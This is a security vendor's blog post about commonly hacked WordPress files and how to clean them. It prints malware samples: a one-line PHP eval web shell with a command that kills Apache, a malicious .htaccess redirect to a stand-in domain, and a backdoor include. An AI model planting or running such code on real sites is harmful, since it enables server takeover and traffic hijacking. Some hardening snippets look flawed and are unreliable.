911 Hack Removal

Commonly Hacked WordPress Files. How to Scan & Fix Infected WordPress Files?

Updated on: May 4, 2020

Commonly Hacked WordPress Files. How to Scan & Fix Infected WordPress Files?

WordPress is a democratic revolution when it comes to creating and hosting content. This has led to a massive upsurge in its popularity. According to the official WordPress website, it powers around 32% of internet sites. However, at times various WP sites are compromised due to attacks like the wp-config.php hack. Nevertheless, the popularity of WordPress is because of it’s open source structure. Commenting on this, its founder Matt Mullenweg said that.

Two things WordPress has been able to exemplify is that Open Source can create great user experiences and that it’s possible to have a successful commercial entity and a wider free software community living and working in harmony.

However, at times vulnerabilities in WordPress have led to the compromise of thousands of sites. Like the infamous case of The Slider Revolution issue. This was an LFI vulnerability which exposed thewp-config.php file. This led to a wp-config.php hack which we shall discuss in the article. So, before it was patched, thousands of websites had been compromised with SoakSoak.ru malware. The highlight of this hack was the Panama leak caused by this malware.

1) WordPress wp-config.php Hack

Wp-config.php is an important file of the WP installation. It acts as a bridge between the WP file system and the MySQL database. Further, Wp-config.php contains the database connection credentials. Apart from this, it can also be used for:

  • Defining the security keys
  • To specify the database prefix
  • To set the default language for your admin panel

Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)

Therefore, owing to its sensitive nature, it is a ripe target. In November 2016, a critical flaw was found in the plugin Revolution Image Slider. This was an LFI(Local File Intrusion) injection. By a simple code, the attacker could access the wp-config file. This led to a wp-config.php hack.


So basically appending this code after any URL, the wp-config file could be accessed. The  Soaksoak.ru malware actively exploited this. The first step was to access the file to conduct wp-config.php hack. Secondly, a malicious theme is uploaded to the WP site. This installs the Filesman backdoor. Apart from this, theswfobject.js is modified to redirect users.  Thus conducting a WordPress hack via wp-config.

2) WordPress index.php Hacked

Theindex.php helps in loading the default theme for WP installation. At times, it could be difficult to grasp the concept of template hierarchy. So in a layman’s terms, either there should be a  front-page.php file or a home.php file. If neither of them is present, it servesindex.php. In case, there is noindex.php, the directory listing gets enabled. This can expose the sensitive files. Therefore, index.php is appealing to attackers.

For instance, the pub2srv malware targetedindex.php filesResearches at Astra were monitoring this large spread malware redirection campaign. Firstly the website is compromised using an SQL injection. Then, theindex.php is injected with JavaScript. As a result, users are redirected or pop-ups are displayed. The infectedindex.php files were found injected with a code snippet like this.

wp config php hack

At times updates can cause a problem in.index.php. Often the web admins rename the index files while updating toindex.php.old. So, there are web scanners designed specifically to scan such files. Once found, it can leak sensitive info to the attackers. The attacker could further use this info to compromise the site!

Related Guide – WordPress Malware Removal

3) WordPress .htaccess Hacked

The .htaccess file helps to modify the way site is accessed. The .htaccess file is a very powerful and versatile component. It contributes to the security of your WP installation. Using this, we can:

  • Restrict access to certain folders of the site.
  • Create Redirects.
  • Force HTTPS.
  • Manage Caching.
  • Prevent a few script injection attacks.
  • Stop bots from finding usernames.
  • Block image hotlinking.
  • Force automatical downloads of a file.
  • Manage file extensions.

However, when under attack these features can be used to harvest clicks for the attacker. Often, the.htaccess file is injected with malicious code to redirect users. Sometimes it’s used to display spam. For instance look at the code given below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The malicious code in the last line is redirecting the user traffic from the site.  As a result, the users are redirected tohttp://MaliciousDomain.tld. Then, it tries to load thebad.php script. If you notice unusual redirect from your site, it is most likely due to .htaccess file hack. However, if the file is empty do not panic. In that case, the server automatically fills the contents.

WordPress Theme Files Hacked

1) WordPress Footer.php Hacked

The footer area of WordPress is defined by the filefooter.php. This area contains certain widgets which remain the same throughout the website. For example, the share widget or the social media widgets at the bottom of your website. Or at times it could be just copyright info, credits etc. However, due to HTML5’s new methodsfooter.php has become more powerful. Now, the elements of footer can be used not only at the bottom but at other sections of the site as well.

So, footer.php is an important file that can be targeted by the attackers. It is often used for malware redirects and displaying spam content  as was the case of Default7.com Redirect Malware. In many cases, thefooter.php was infected with Javascript in the primary stages. However, in the later stagesheader.php was a target. Moreover, the encrypted values for redirect were stored in.SIc7CYwgY or .SIc7CYwgY1 file in the site root. If these locations were unavailable, /var/tmp/.SIc7CYwgY was used.

2) WordPress Header.php Hacked

The header.php files help developers to customize the header image of the theme. And thus, header.php was the second target of Default7.com Redirect Malware. However, adding the same functions to footer and header resulted in some errors. The header.php file was modified to insert malicious code. Even though the code mostly looked gibberish but decoding it made things more clear. It was clear that it basically redirected users to a website. Also, cookies were used to uniquely identify the users. This cookie had a time limit of one year.

Wordpress header.php hack

Moreover, in another instance, the attackers injected JavaScript codes into all files with a .js extension. What makes the detection of malware difficult is that it is a part of the core files!

3) WordPress Functions.php Hacked

The functions file behaves like a plugin. Which means, it can be used to add extra features and functionality to the WordPress site. The filefunctions.php can be used:

  • For calling WordPress functions.
  • To call native PHP functions.
  • Or to define your own functions.

Moreover, the filefunctions.php is present in every theme. But thefunctions.php in only the active themes affects site rendering. And hence, this file was actively targeted by attackers in the Wp-VCD Backdoor Hack. This malware created new admins and injected spam pages in the site. So, sites showed signs of Pharma and Japanese SEO spam.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

As is evident from the code above, this file includes class.theme-modules.php file. This file is then used to install malware into other themes. Thus creating new users and backdoors. This allowed attackers to access the site even after the file is cleaned up!

Need professional help to remove the WordPress file hack? Drop us a message on the chat widget, and we’d be happy to help you. Fix my WordPress website now.

4) WordPress wp-load.php Hacked

Thewp-load.php is an important file for every plugin. The filewp-load.php helps in bootstrapping the WordPress environment. So, this gives the plugins ability to use the native WP core functions. Many of the malware variants infect WordPress sites by creating malicious wp-load files as was seen in the case of China Chopper Web shell malware. This typical behavior was to create files likewp-load-eFtAh.php on the server. These files would contain codes like:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code allows the attacker to run any PHP code which is given by thepass get parameter. Using this further, harmful commands could be executed. For instance, the commandhttp://yoursite/your.php?pass=system("killall -9 apache"); could kill the processes. This can shut down the entire server. In a nutshell, this is a small yet dangerous malware which could get complete hold of the server!

WordPress Files Cleanup

1) Cleaning Files

Firstly, investigate the causes of attacks like the wp-config.php hack. Then remove the malicious code. Secondly, restore the infected files from the backup. In case the backup is unavailable use fresh files. However, ensure that a backup copy is present all the times.

2) Secure Using Plugins

At times the site may fall prey to automation. An automatic brute force attack can compromise the admin panel. So the AG Custom Admin plugin can help in hiding this page. It renames the login panel to a keyword of user’s choice. Moreover, certain plugins can block the username enumeration.

3) Hiding Files

Often, exposing files can reveal sensitive info. This could lead to a wp-config.php hack. Therefore, it becomes necessary to hide these files on the server. So, the .htaccess file can help in securing these files. To hide WP-content/uploads add the following code o your .htaccess file.

Order Allow,Deny
Deny from all
Allow from all

To hide wp-includes add this to the .htaccess file:

# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]

Also, the WP Hardening Plugin can help in hiding the content of a WordPress site. Making it hard for attackers to identify it and exploit!

Related Guide – Step by Step Guide to WordPress Malware Removal

4) Updating

Always ensure that the WP installation is up to date. Most of the loopholes can be plugged by running an updated installation. Use the reputed plugins and themes only. Avoid poorly coded or null themes. Moreover, update the plugins regularly along with core installation. Thus keeping attacks like the wp-config.php hack at bay.

Here’s a complete step by step video to secure your WordPress site.

5) Firewall

A firewall goes a long way in securing your site. The firewall can monitor the incoming traffic and take preventive measures to block infection. It can effectively prevent attacks like the wp-config.php hack. There are multiple cost-effective firewall solutions available in the market today. The one at Astra is flexible and suitable for your needs.

How Web Application Firewall works
How Astra Web Application Firewall protects you

The Astra firewall can detect infections and remove them. Apart from that, all the vulnerabilities will be automatically plugged.

Take an Astra demo now!

6) WordPress Security Audit or Pen testing

With WordPress being the most popular CMS in usage and thus a place for increased security issues, attackers are always on the prowl for exploitable vulnerabilities on WordPress websites. Consequently, Pen-Testing a WordPress site has become essential in order to keep it secure from attacks. Penetration Testing is a simulated attack performed against a web application, network or a computer system to evaluate its security and find any vulnerabilities it has prior to an attacker thus helping in protect it. One of the different simulated attacks carried out while Pen-Testing a WordPress site would be to check for Directory Listing vulnerability that basically indexes sensitive directories such as wp-includes, wp-index.php,  wp-config.php, wp-admin, wp-load.php, wp-content etc. and could thus provide an attacker with sensitive information.

Fix 12+ security issues with a click using our Free WP Hardening Plugin

WP Hardening plugin

Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)

Was this post helpful?

Tags: , , , , ,

Shikhil Sharma

Shikhil Sharma is the founder & CEO of Astra Web Security. Being involved with cybersecurity for over six years now, his vision is to make cyber security a 5-minute affair. Shikhil plays on the line between security and marketing.From time to time, he shares his knowledge on core cybersecurity topics on Astra’s blog. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football.

Questions? Got something to add? Let’s Talk

2 Comment threads
1 Thread replies
Most reacted comment
Hottest comment thread
2 Comment authors
Sai KrishnaHendrick Laama Recent comment authors

This site uses Akismet to reduce spam. Learn how your comment data is processed.

newest oldest most voted

[…] Check our detailed blog on Commonly Hacked WordPress files and How it affects your WordPress Website. […]

Hendrick Laama
Hendrick Laama

Hello really post, please i have a question. How can i exploit a wordpress that wp-content/upload indexing is enabled?

Sai Krishna

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany